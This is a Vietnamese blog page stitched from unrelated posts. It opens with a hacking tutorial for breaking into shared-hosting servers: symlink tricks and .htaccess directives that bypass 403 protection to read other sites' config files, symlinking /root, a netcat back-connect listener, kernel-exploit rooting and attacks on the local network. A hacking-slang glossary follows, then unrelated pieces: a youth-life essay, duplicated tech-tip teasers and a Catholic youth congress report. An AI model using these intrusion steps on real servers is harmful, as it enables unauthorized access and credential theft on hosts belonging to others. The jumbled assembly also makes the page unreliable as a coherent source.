Nhưng không phải khi nào ta cũng có điều kiện tốt như vậy. Chủ của website có thể chmod không cho ta đọc file config (100,101,400... ) chẳng han.Tùy server.Hoặc chủ website đặt tại thư mục chứa file config đấy 1 file .htaccess có nội dung như sau.

<Files config.php>
order allow, deny
deny from all
</Files>

Nếu chủ site đặc như thế thì khi symlink ta sẽ nhận được thông báo là 403 Forbidden Error.
Ở bài này mình chỉ nói đến tư tưởng tấn công chứ không nói chi tiết về phương pháp tấn công.Nên mình chỉ nêu 1 vài ví dụ.

Nếu như ta không đọc được thì sao.Ta phải suy nghĩ vì sao không đọc được.Tư duy đặt trường hợp ta vào vị trí admin của victim.Nếu là ta ,ta sẽ bảo mật như thế nào.Sẽ làm gì.Từ đó ta có những biện pháp khác nhau.

Giả sử như ta tìm giải pháp để bypass 403 forbidden error do chủ website đặt file .htaccess chẳng hạn nhé.
Trên host ta đặt shell.Tạo một thư mực có tên là VHBSYSTEM chẳng hạn.Đường dẫn đầy đủ của nó ví dụ như sau : /home/attacker/public_html/VHBSYSTEM/ .Chmod lại thư mục này là 777 (lúc đầu chưa cần.Nếu không được hẵn thử ). Sau đó tạo một file .htaccess với nội dung như sau

HeaderName vhb.txt

Đặt file .htaccess này vào thư mục /home/attacker/public_html/ . Nếu ta symlink file config vào file vhb.txt với cấu trúc lệnh ln -s /home/victim/public_html/includes/config.php vhb.txt

Thì sau khi symlink xong .Ta vào thư mục VHBSYSTEM và đọc file vhb.txt vừa symlink về.Nó sẽ bypass được.

Đây chỉ là 1 ví dụ trong nhiều cách bypass.Nhiều bạn bảo local phải có tư duy.Nhưng mình nghĩ muốn local tốt thì phải biết nhiều cách bypass trong trường hợp không đọc được file.

Vấn đề này bạn nên tham khảo thêm ở nhiều tài liệu được share trong VHB. ( hoặc ghé thăm vhbgr0up.blogspot.com )

Trong các cách cũng được khá nhiều người dung.Nhưng dùng symlink all config ( cái này trên blog và forum của vhb cũng có nói rồi ). Sym root bằng cách tạo sym root ở một server linux nào đó .Sau đó tar lại.Up lên server cần local.Cái này trên VHB cũng nhiều bài nói đến rồi.

Mình đề cập thêm việc sym root ngay trực tiếp trên server.Đôi khi nó khá hiệu quả trong việc bypass security.
Như khi nãy.Tạo một folder VHB để tiện xử lí.Link full của nó /home/attacker/public_html/VHB .Sau đó ta thực hiện symlink trên shell như sau " ln -s /root" . Sau đó ta chọn một victim có domain là target.com chẳng hạn.Tiếp tục type "ls -la /etc/valiases/target.com" .Sau ddos quay lại folder ta vừa tạo VHB.Đặt vào đấy 1 file htaccess có nội dung như sau

Options Indexes FollowSymLinks
DirectoryIndex index.htm
AddType txt .php
AddHandler txt .php

Bây giờ ta vào xem ta symlink được những gì.Nếu như chỗ nào nó báo permisssion access.Thì cũng đừng lo lắng bận tâm.Hãy vào sâu hơn.Giả sử ta cần xem target.com có user lấy được ở trên là target đi.
Thì ta xem nó với link sau attacker.com/VHB/root/home/target/public_html/ ......
Đôi khi xem không được thì có thể view source lên nhé.

Thôi dừng ở việc local lại.Không viết đến khi nào mới xong.Bạn cứ lượn trên blog VHB 1 tuần.Kiểu gì chả pro local :).


Bước 5.Rooting.

Nếu là server linux thì nên thử Get root nó .Đôi khi thử rooting server lại là con đường ngắn hơn cả local sang.Không phải khi nào cũng local được.Nó bảo mật bá đạo quá thì cũng chịu chết thôi.Hãy thử rooting nếu được.

Tạo một backconnect hoặc có thể bind một port nào đó.MỘt back connect ở đây là server có thể tự connect về mình sau khi mình mở một port đặng biệt nào đó và lắng nghe nó bằng netcat ( nc -l -v -p 4444 ) chẳng hạn.Có khá nhiều shell hỗ trợ back-connect..

Muốn rooting thì phải kiểm tra xem kernel đó có rooting được hay không.Trên shell bạn có thể kiểm tra bằng lện "uname -a" .Lấy phiên bản của kernel nhân được .Tìm trên google xem nó thể exploit đc hay không.
(Có thể vào exploit-db.com/local/ ) để tìm.

Bước 6: Attack Mạng Lan.

Nếu bạn đã chiếm đc 1 server máy chủ rồi.Thì hãy cố gắng thử tấn công các máy cùng mạng Lan với nó.Đây là cơ hội để thể hiện khả năng attack trong mạng Lan của bạn.Cái này khi nào đấy bảo smod Hoangnhatnam của chúng ta demo.Để anh em mở mắt :))

iCarus - VHB Group

Một vài thuật ngữ hacking

★ DDoS =
Distributed Denial of Service

★ DrDoS =
Distributed Reflected Denial of Service Attack, uses a list of reflection servers or other methods such as DNS to spoof an attack to look like it's coming from multiple ips. Amplification of power in the attack COULD occur.

★ FTP =
File Transfer Protocol. Used for transferring files over an FTP server.

★ FUD =
Fully Undetectable

★ Hex =
In computer science, hexadecimal refers to base-16 numbers. These are numbers that use digits in the range: 0123456789ABCDEF. In the C programming language (as well as Java, JavaScript, C++, and other places), hexadecimal numbers are prefixed by a 0x. In this manner, one can tell that the number 0x80 is equivalent to 128 decimal, not 80 decimal.

★ HTTP =
Hyper Text Transfer Protocol. The foundation of data communication for the World Wide Web.

★ IRC =
Internet Relay Chat. Transmiting text messages in real time between online users.

★ JDB =
Java drive-by, a very commonly used web-based exploit which allows an attacker to download and execute malicious code locally on a slave's machine through a widely known java vulnerability.

★ Malware =
Malicious Software

★ Nix =
Unix based operating system, usually refered to here when refering to DoS'ing.

★ POP3 =
This is the most popular protocol for picking up e-mail from a server.

★ R.A.T = Remote Administration Tool

★ SDB =
Silent drive-by, using a zero day web-based exploit to hiddenly and un-detectably download and execute malicious code on a slave's system. (similar to a JDB however no notification or warning is given to the user)

★ SE =
Social Engineering

★ Skid =
Script Kid/Script Kiddie

★ SMTP =
A TCP/IP protocol used in sending and receiving e-mail.

★ SQL =
Structured Query Language. It's a programming language, that used to communicate with databases and DBMS. Can go along with a word after it, such as "SQL Injection."

★ SSH =
Secure Shell, used to connect to Virtual Private Servers.

★ TCP =
Transmission Control Protocol, creates connections and exchanges packets of data.

★ UDP =
User Datagram Protocol, An alternative data transport to TCP used for DNS, Voice over IP, and file sharing.

★ VPN =
Virtual Private Network

★ VPS =
Virtual Private Server

★ XSS (CSS) =
Cross Site Scripting

Words

Algorithm =
A series of steps specifying which actions to take in which order.

ANSI Bomb =
ANSI.SYS key-remapping commands consist of cryptic-looking text that specifies, using ansi numeric codes to redefine keys.

Back Door =
Something a hacker leaves behind on a system in order to be able to get back in at a later time.

Binary =
A numbering system in which there are only two possible values for each digit: 0 and 1.

Black Hat =
A hacker who performs illegal actions to do with hacking online. (Bad guy, per se)

Blue Hat =
A blue hat hacker is someone outside computer security consulting firms who is used to bug test a system prior to its launch, looking for exploits so they can be closed. Microsoft also uses the term BlueHat to represent a series of security briefing events.

Bot =
A piece of malware that connects computer to an attacker commonly using the HTTP or IRC protocal to await malicous instructions.

Botnet =
Computers infected by worms or Trojans and taken over by hackers and brought into networks to send spam, more viruses, or launch denial of service attacks.

Buffer Overflow =
A classic exploit that sends more data than a programmer expects to receive. Buffer overflows are one of the most common programming errors, and the ones most likely to slip through quality assurance testing.

Cracker =
A specific type of hacker who decrypts passwords or breaks software copy protection schemes.

DDoS =
Distributed denial of service. Flooding someones connection with packets. Servers or web-hosted shells can send packets to a connection on a website usually from a booter.

Deface =
A website deface is an attack on a site that changes the appearance of the site or a certain webpage on the site.

Dictionary Attack =
A dictionary attack is an attack in which a cyber criminal can attempt to gain your account password. The attack uses a dictionary file, a simple list of possible passwords, and a program which fills them in. The program just fills in every single possible password on the list, untill it has found the correct one. Dictionary files usually contain the most common used passwords.

DOX =
Personal information about someone on the Internet usualy contains real name, address, phone number, SSN, credit card number, etc.

E-Whore =
A person who manipulates other people to believe that he/she is a beautiful girl doing cam shows or selling sexual pictures to make money.

Encryption = I
n cryptography, encryption applies mathematical operations to data in order to render it incomprehensible. The only way to read the data is apply the reverse mathematical operations. In technical speak, encryption is applies mathematical algorithms with a key that converts plaintext to ciphertext. Only someone in possession of the key can decrypt the message.

Exploit =
A way of breaking into a system. An exploit takes advantage of a weakness in a system in order to hack it.

FUD =
Fully undetectable, can be used in many terms. Generally in combination with crypters, or when trying to infect someone.

Grey Hat =
A grey hat hacker is a combination of a Black Hat and a White Hat Hacker. A Grey Hat Hacker may surf the internet and hack into a computer system for the sole purpose of notifying the administrator that their system has been hacked, for example. Then they may offer to repair their system for a small fee.
Hacker (definition is widely disputed among people...) = A hacker is someone who is able to manipulate the inner workings of computers, information, and technology to work in his/her favor.

Hacktivist =
A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks.

IP Address =
On the Internet, your IP address is the unique number that others use to send you traffic.

IP Grabber =
A link that grabs someone's IP when they visit it.

Keylogger =
A software program that records all keystrokes on a computer's keyboard, used as a surveillance tool or covertly as spyware.
Leach = A cultural term in the warez community referring to people who download lots of stuff but never give back to the community.

LOIC/HOIC =
Tool(s) used by many anonymous members to conduct DDoS attacks. It is not recommended to use these under any circumstances.

Malware =
Software designed to do all kinds of evil stuff like stealing identity information, running DDoS attacks, or soliciting money from the slave.

Neophyte =
A neophyte, "n00b", or "newbie" is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology, and hacking.

smith =
Somebody new to a forum/game.

OldFag =
Somebody who's been around a forum/game for a long time.

Packet =
Data that is sent across the Internet is broken up into packets, sent individually across the network, and reassembled back into the original data at the other end.

Phreak =
Phone Freaks. Hackers who hack cell phones for free calling. Free Long distance calling. Etc.

Phreaking =
The art and science of cracking the phone network.

Proxy =
A proxy is something that acts as a server, but when given requests from clients, acts itself as a client to the real servers.

Rainbow Table =
A rainbow table is a table of possible passwords and their hashes. It is way faster to crack a password using rainbow tables then using a dictionary attack (Bruteforce).

Remote Administration Tool =
A tool which is used to remotely control (an)other machine(s). These can be used for monitoring user actions, but often misused by cyber criminals as malware, to get their hands on valuable information, such as log in credentials.

Resolver =
Software created to get an IP address through IM (instant messenger, like Skype/MSN) programs.

Reverse Engineering =
A technique whereby the hacker attempts to discover secrets about a program. Often used by crackers, and in direct modifications to a process/application.

Root =
Highest permission level on a computer, able to modify anything on the system without restriction.

Rootkit (ring3 ring0) =
A powerful exploit used by malware to conceal all traces that it exists. Ring3 - Can be removed easily without booting in safemode. Ring0 - Very hard to remove and very rare in the wild, these can require you to format, it's very hard to remove certain ring0 rootkits without safemode.

Script Kiddie =
A script kid, or skid is a term used to describe those who use scripts created by others to hack computer systems and websites. Used as an insult, meaning that they know nothing about hacking.

Shell =
The common meaning here is a hacked web server with a DoS script uploaded to conduct DDoS attacks via a booter. OR A shell is an script-executing unit - Something you'd stick somewhere in order to execute commands of your choice.

Social Engineer =
Social engineering is a form of hacking that targets people's minds rather than their computers. A typical example is sending out snail mail marketing materials with the words "You may already have won" emblazoned across the outside of the letter. As you can see, social engineering is not unique to hackers; it's main practitioners are the marketing departments of corporations.

Spoof =
The word spoof generally means the act of forging your identity. More specifically, it refers to forging the sender's IP address (IP spoofing). (Spoofing an extension for a RAT to change it from .exe to .jpg, etc.)

SQL Injection =
An SQL injection is a method often used to hack SQL databases via a website, and gain admin control (sometimes) of the site. You can attack programs with SQLi too.

Trojan =
A Trojan is a type of malware that masquerades as a legitimate file or helpful program with the ultimate purpose of granting a hacker unauthorized access to a computer.

VPS =
The term is used for emphasizing that the virtual machine, although running in software on the same physical computer as other customers' virtual machines, is in many respects functionally
equivalent to a separate physical computer, is dedicated to the individual customer's needs, has the privacy of a separate physical computer, and can be configured to run server software.

Warez =
Software piracy

White Hat =
A "white hat" refers to an ethical hacker, or a computer security expert, who specializes in penetration testing and in other testing methods to ensure the security of a businesses information systems. (Good guy, per se)

Worm =
Software designed to spread malware with little to no human interaction.

Zero Day Exploit =
An attack that exploits a previously unknown vulnerability in a computer application, meaning that the attack occurs on "day zero" of awareness of the vulnerability. This means that the developers have had zero days to address and patch the vulnerability.

Capuchino - VHB Group

BẠN TRẺ VÀ ĐỊNH HƯỚNG CUỘC SỐNG

Dường như tình trạng thất nghiệp và cùng với nhiều hiện trạng xã hội gắn liền với giới trẻ đang là một trong những điểm nhấn đau đầu của xã hội. Phải chăng khái niệm định hướng trong cuộc sống bỗng trở nên xa lạ với bạn trẻ ngày nay.

Mất định hướng trong tương lai

Mất định hướng gần như là điều bình thường dành cho bạn trẻ ngày nay. Không chỉ là dành cho học sinh chuẩn làm hồ sơ đăng ký thi đại học, phải chọn cho mình ngành học và công việc sau này mà cả sinh viên đang ngồi ghế giảng đường hay đã tốt nghiệp ra trường. Câu hỏi hóc bứa, tôi sẽ làm gì và công việc tương lai của tôi sẽ ra sao dường như khó trả lời. Ngồi trò chuyện với một em học sinh lớp 11, tại quận Bình Thạnh- Tp Hồ Chí Minh, tôi hỏi thăm về kết quả thi cuối học kỳ của em và sau là tương lai em muốn học về ngành nghề nào? Câu trả lời tôi nhận được là nụ cười vị kết quả thi rất tốt nhưng cũng là nụ cười thay cho câu hỏi sau về tương lai của em. Đúng là một điều là giáo dục nước nhà thiếu thật những chương trình định hướng nghề nghiệp hay khám phá bản thân dành cho các bạn học sinh đang đứng trước ngưỡng cửa đại học.

Sau khi ra trường với bạn trẻ chuyện mất định hướng dường như còn là vấn nạn đau đầu cho những ai nghĩ đến tương lai của dân tộc và xã hội nước nhà. Thất nghiệp và đinh hướng nghề nghiệp đi liền với nhau. Không ít bạn trẻ chỉ vùi mình trong quán cafe từ sáng đến chiều, hay úp mình trong laptop, điện thoại với thế giới ảo. Để rồi liên tục đổi lỗi cho xã hội, cho nền giáo dục hay cho may mắn và quên rằng chính mình nên xem lại định hướng của bản thân.

Mất định hướng trong hướng sống

Chuyện định hướng không chỉ là định hướn về sự nghiệp mà cả là về lối sống. Chuyện kể về ngày mở cửa miễn phí tại công viên nước Hồ Tây- Hà Nôi và những mẩu chuyện về nó dường như là minh họa rõ nét nhất cho cách sống lạc hướng của bạn trẻ ngày nay. Khi được hỏi về câu chuyện, một bạn trẻ thuộc nhóm giới trẻ giáo xứ Hàng Xanh đã đặt câu hỏi khá hay cho các bạn khác trong nhóm sinh hoạt của mình rằng: "Nếu là bạn, bạn ở Hà Nội, bạn biết chương trình đó, Bạn có tham gia và cũng lao mình vào dòng người đó không ?" Hướng sống hay thái độ sống thể hiện nhiều khía cạnh nơi người trẻ. Riêng bản thân, nếu các bạn trẻ có hướng sống lành mạnh chắc hẳn sẽ không có những hình ảnh xấu xí xảy ra nơi khu vui chơi được mở cửa lần đầu tại Hồ Tây. Khi bạn trên, đặt ra câu hỏi đó đồng nghĩa bạn ấy đã có cho mình một hướng sống riêng, và điều ấy cần kíp lắm cho bạn trẻ ngày nay. Lối sống hay hướng sống là điều thể hiện được nội lực của bản thân. Có thể nói có cho mình một hướng sống cũng là đặc điểm của một người tri thức. Và giá trị nhân vị con người nơi xã hội cũng sẽ được nâng lên theo.

Hãy chọn cho riêng mình một hướng sống

Quảng cáo các sản phẩm trên truyền hình, lâu có những câu khá hay ví dụ như "Mở lối đi riêng". Câu nói trên không ít lần làm tôi suy nghĩ. Và trong nhiều quyển sách hướng dẫn vè kỹ năng dành cho người trẻ, nhiều tác giả cũng muốn ghép ý câu nói trên. Nó gần như câu nói: "Hãy chọn cho riêng bạn một hướng sống tích cực".

Hình ảnh- Người trẻ leo rào để vào công viên nước Hồ Tây
Cách đây không lâu, tôi đọc được bài phỏng vấn của một chương trình với một anh là tác giả chế tạo máy. Người ta hỏi anh vì sao làm công chức giấy tờ lại biết chế máy cho nông dân, mà chế có vẻ thực tế vậy. Anh kể, hàng ngày anh đi làm, đều phải ngồi xe công ty một tiếng để tới thành phố vào làm. Một tiếng đó anh ngồi đọc sách, vẽ mẫu, xong đâu đấy thì chế thử, cuối cùng cũng ra.

Vậy là khi vài chục người khác cùng công ty trên chuyến xe của anh đang ngủ, đang tán dóc, đang nghe nhạc, đang nói xấu đồng nghiệp, thì anh ta đọc sách. Với một năm đi làm, anh ta vừa có lương, vừa “thặng dư” được 200-300 giờ đọc sách, tức là tương đương 8 -12 ngày đọc sách 24 giờ liên tiếp. Mớ kiến thức tưởng chừng đùa giỡn của anh công chức, trang từ điển tưởng chừng xé ra chơi của ông thầy, gom lại đã thành một tương lai rất khác của người ta – khi ta trẻ và thừa thãi thời gian để tiêu phí.

Như vậy là anh cũng đã lựa chọn cho mình một hướng sống, một thái độ sống riêng. Không hẳn là anh đã hơn những người còn lại, nhưng anh đã có thành công riêng khi đã chọn cho riêng mình một thái độ sống tích cực. Hay còn nhiều hơn nữa những trường hợp cho bạn và tôi những ý niệm về hương sống. Câu chuyện về một thầy giáo người Nhật tự học tiếng Anh trong gia cảnh khó nghèo của ông, khi ông đang ở tuổi 14. Ông kể rằng, ông đã dành thời gian rảnh khi đi làm thêm ở bãi giữ xe để học từ vựng hay khi ông đang đi tàu điện. Ông đã không dừng lại nhưng đã mở lối đi riêng của mình để đạt được mục tiêu của riêng mình là thành thạo một ngôn ngữ. Nay, sẽ khó ai tin được giáo sư người Nhật hiện tại lại có một khoảng thời gian khó khăn trong việc học và cuộc sống.

Bây giờ, việc "mở lối đi riêng" đã trở nên dễ hơn rất nhiều. Ông thầy người Nhật kia để đạt được thành công đã phải tốn công xé giấy, anh công chức phải vác sách theo. Chớ bây giờ, ai cũng có cái điện thoại để nghe nhạc, chơi Facebook, xem phim, kênh online Youtube. Những dụng cụ đó có thể xem được vô số loại sách vở trên đời, cứ mở ra nhìn vô là thấy thứ để đọc.

Hướng sống tốt khi tham gia cùng cộng đồng

Có nhiều ý kiến cho rằng, các bạn trẻ hành động thái quá ở công viên nước Hồ Tây là vì xã hội hiện nay đang thiếu những khu vui chơi dành cho người trẻ. Không ít bạn trẻ đồng ý với lời biện hộ ấy. Tôi thì không nghĩ thế, thái độ của người trẻ ảnh hưởng lớn đến quyết định cũng như hành động.

Hình ảnh- Các bạn trẻ tham gia sinh hoạt tại giáo xứ Hàng Xanh
Hiện nay, các tổ chức đặc biệt các tổ chức tôn giáo có khá nhiều nhóm nhỏ, nhằm tạo sân chơi lành mạnh cũng như học hỏi kiên thức chuyên môn cũng như kỹ năng mềm. Thế nhưng, vỏ bọc hay thái độ sống thiếu định hướng chính là rào cản người trẻ đến với thái độ sống tích cực. Những hoạt động nâng cao tình thần, phi lợi nhuận từ các nhóm xã hội cũng như tôn giáo mở ra cơ hội lớn.

Kết

Tôi và bạn cùng nhau tưởng tượng, khi còn mười tám đôi mươi, chúng ta sẽ có nhiều thời gian để làm điều mình thích, ta có thể lựa chọn và đắm mình trong vòng xoáy của xã hội. Những vào một lúc nào đó, bạn và tôi sẽ phải chi xài quỹ thời gian của mình cách hợp lý hơn và kể cả thứ cơm áo gạo tiền.

Tôi và bạn cần phải nắm giữ cho mình những kỹ năng chuyên môn nào đó, dù nhỏ tý xíu và đơn giản; phải có trí thức cho riêng mình, dù nhiều hay ít. Và sẽ một ngày, sẽ không còn  nhiều bài viết ca thán về tình trạng mất hướng nhìn của người trẻ.

Sửa lỗi nhân vật đứng im hoặc tự di chuyển trong CF 2.0

Sửa lỗi nhân vật đứng im hoặc tự di chuyển trong CF 2.0
Sửa lỗi nhân vật đứng im hoặc tự di chuyển trong CF 2.0

Sửa lỗi nhân vật đứng im hoặc tự di chuyển trong CF 2.0

Chắc nhiều bạn chơi CF 2.0 (ở VN gọi là Đột Kích) đã nhiều lần gặp trường hợp đang chơi thì nhân vật bỗng dưng đứng im không thể nào điều khiển được, hoặc tự dưng di chuyển mà người chơi không kiểm soát được. Vậy làm sao để khắc phục lỗi này? Các bạn sẽ biết ngay sau khi đọc xong bài viết này!
Read More

Sửa lỗi nhân vật đứng im hoặc tự di chuyển trong CF 2.0

Sửa lỗi nhân vật đứng im hoặc tự di chuyển trong CF 2.0
Sửa lỗi nhân vật đứng im hoặc tự di chuyển trong CF 2.0

Sửa lỗi nhân vật đứng im hoặc tự di chuyển trong CF 2.0

Chắc nhiều bạn chơi CF 2.0 (ở VN gọi là Đột Kích) đã nhiều lần gặp trường hợp đang chơi thì nhân vật bỗng dưng đứng im không thể nào điều khiển được, hoặc tự dưng di chuyển mà người chơi không kiểm soát được. Vậy làm sao để khắc phục lỗi này? Các bạn sẽ biết ngay sau khi đọc xong bài viết này!
ĐỌC TIẾP »

Kích hoạt "Tắt tiếng tab" trên Google Chrome

Hướng dẫn kích hoạt tính năng "Tắt tiếng tab" trên Google Chrome
Hướng dẫn kích hoạt tính năng "Tắt tiếng tab" trên Google Chrome
Đã bao giờ bạn bị làm phiền bởi một tab nào đó bất ngờ phát âm thanh khi chưa được cho phép hoặc đang xem video, nghe nhạc trên tab này thì một tab khác bỗng nhiên phát ra tiếng? Đừng lo, giờ đây bạn có thể "Tắt tiếng tab" trên Google Chrome chỉ với một click!

Read More

Kích hoạt "Tắt tiếng tab" trên Google Chrome

Hướng dẫn kích hoạt tính năng "Tắt tiếng tab" trên Google Chrome
Hướng dẫn kích hoạt tính năng "Tắt tiếng tab" trên Google Chrome
Đã bao giờ bạn bị làm phiền bởi một tab nào đó bất ngờ phát âm thanh khi chưa được cho phép hoặc đang xem video, nghe nhạc trên tab này thì một tab khác bỗng nhiên phát ra tiếng? Đừng lo, giờ đây bạn có thể "Tắt tiếng tab" trên Google Chrome chỉ với một click!

ĐỌC TIẾP »

ĐẠI HỘI GIỚI TRẺ MÙA CHAY 2015- TỔNG GIÁO PHẬN TP HỒ CHÍ MINH

"Bạn trẻ, các con đừng ngại phải SỐNG SẠCH"- Đức tổng giám mục Phao lô Bùi Văn Đọc.


Từ trưa thứ bảy, ngày 28 tháng 3, 2015 đến hẹn lại lên các bạn trẻ khắp nơi cùng quý cha và quý tu sĩ trong ngoài giáo phận tập trung về trung tâm mục vụ tổng giáo phận Sài Gòn tham dự đại hội giới trẻ màu Chay 2015 với chủ đề Sống Sạch.



Như một truyền thống tốt đẹp của tổng giáo phận Sài Gòn, chương trình đại hội gồm 2 phần chính thu hút các bạn trẻ tham dự workshop và chương trình chính đại hội giới trẻ.


I. Chương trình workshop

Từ trưa đến 15h30, các bạn trẻ đã đăng ký tham gia vào các chương trình Workshop theo chủ đề trọng tâm của đại hội giới trẻ “Sống sạch” với các chủ đề nhỏ: Sạch trong tình Chúa; Sạch trong tình bạn; Sạch trong tình yêu; Sạch trong hôn nhân; Sạch với chính mình; Sạch trí óc để nâng tầm tư tưởng; và Làm sạch tâm hồn bằng những phút giây lặng yên.Trong chương trình các bạn trẻ được giao lưu với các giảng viên cũng như được thảo luận theo nhóm để giải đáp những câu hỏi của thời đại: Làm sao sống sạch giữa những cạm bẫy của cuộc sống, Như thế nào là tình yêu chân chính cho người trẻ ngày nay? Cách nào sử dụng Internet cách hữu dụng nhất ?




II. Phần Sinh hoạt chung đạ hội giới trẻ

Sau phần workshop, là phần các bạn trẻ hòa mình vào các điệu nhảy và điệu múa cử điệu của  chương trình đặc biệt bài chủ đề của đại hội giới trẻ “Xanh lên màu mạ non” và “Tôi Tin”. Trên sân khấu với những gam màu tạo sự thu hút dành cho các bạn trẻ. Khởi đầu chương trình, bài múa thể hiện cuộc chiến có thể được coi là kinh điển trong cuộc sống – cuộc chiến giữa Thiện và Ác, giữa bóng tối và ánh sáng. Sau đó Cha đặc trách giới trẻ đã tuyên bố chính thức khai mạc đại hội giúp cho các bạn tham dự hiểu rõ hơn về màn múa khởi đầu của chương trình đại hội cũng như cách bố trí của sân khấu dựa theo lời mời gọi của đức thánh cha Phanxico gửi người trẻ: “"Phúc cho ai có tâm hồn trong sạch, vì họ sẽ được thấy Thiên Chúa”.


III. Tham dự thánh lễ Lá - Chương trình sinh hoạt

Tâm điểm của đại hội giới trẻ là thánh lễ lá do Đức Tổng Phao-lô chủ tế cùng hơn 20 quý cha đồng tế. Trong bài giảng, Đức cha mời gọi mọi người hãy theo gương Chúa Kito, nhìn lên Thánh giá để phó thác và tin tưởng cùng với từ bỏ thần dữ. Sống sạch theo đường thánh giá để được chết và phục sinh với Người.

Sau thánh lễ long trọng là các phần nội dung của chương trình đại hội. Mở đầu MC và cha đặc trách giới trẻ đã mời Đức Cha Phaolo chia sẻ lại sứ điệp của Đức thánh Cha gủi cho người trẻ lần thứ 30. Đức Cha đã chia sẻ về sự tạo dựng tốt đẹp của Thiên Chúa, cùng nhắn nhủ cách sử dụng và hãy làm sạch lại môi trường do con người đã tàn phá. "Bạn trẻ, các con đừng ngại phải SỐNG SẠCH" Những mẫu chuyện nhỏ tuy dí dỏm nhưng thiết thực đã được Đức cha kể ra để cho người trẻ thấy được tầm quan trọng của việc bảo vệ môi trường. Theo sau bài phát biểu, của đức cha, MC chương trình giới thiệu 3 nhóm bạn trẻ tham gia chương trình: Gió yêu thương, Thiên Ân, Sức trẻ cố đô.  Các bạn trẻ ngày nay khi rời quê nên cũng cần được mời gọi hãy tham gia các hoạt động nhóm, ngoài ý nghĩa giúp nhau nâng cao đời sống đức tin mà còn có ý nghĩa thiết thực trong các hoạt động bác ái của nhóm.

Sau đó chương trình, sôi động hẳn lên với phần thi chung kết của chương trình YOUCAT được tổng giáo phận tổ chức Rất đặc biệt khi vòng chung kết được diễn ra ngay tại đại hội giới trẻ như nhắc nhỏ người trẻ năng tìm hiểu giáo lý và Kinh Thánh nhiều hơn.
Sau phần thi, các bạn trẻ được mời gọi lắng đọng khi nhìn vào hình ảnh CHúa giesu qua cuộc diễn nguyện: Chúa chịu cám dỗ nhưng Ngài đã vượt qua và chiến thắng sự dữ, mở ra cánh cửa hy vọng cho nhân loại.

IV. Phần cuối và kết

Phần cuối của chương trình được điều khiển bởi chính cha đặc trách giới trẻ. Với gói hành trang được trang bị mỗi bạn 1 cây nến được thắp lên cha mời gọi các bạn trẻ chìm mình vào thinh lặng để nhìn ra ánh sáng giữa cuộc sống nhiều bóng tôí, khoảng cách giữa thiện ác mong manh, chỉ cần 1 nhấp chuột sẽ giúp mở ra nhiều điều mới? cha đặt ra câu hỏi giữa hoen úa và thánh thiện ta chọn gì? Theo chúa và đứng lên hay là vô cảm? Cha mời gọi hãy để chúa đồng hành và giúp người trẻ vươn lên trong đời sống kito hữu. Sau lời hướng dẫn, các bạn trẻ tiếp tục hòa mình vào các bài hát và cử điệu múa để nối dài tâm tình của đại hội với những bài hát thân quen của bạn trẻ: “Du ca tình yêu” , để con nên hình bóng của Ngài”.

Chương trình đại hội kết thúc vào lúc 10h, tuy nhiên vẫn có các bạn trẻ nán lại để tham gia các bài múa với các tình nguyện viên của đại hội như âm hưởng còn kéo mãi trong tim những tham dự viên, hẹn cho kỳ đại hội năm sau.

 




















 
Ky nang ban hang ky-nang-ban-hang
10 10 1125 (c) by
Google Thủ thuật, hacking, tool, code, công cụ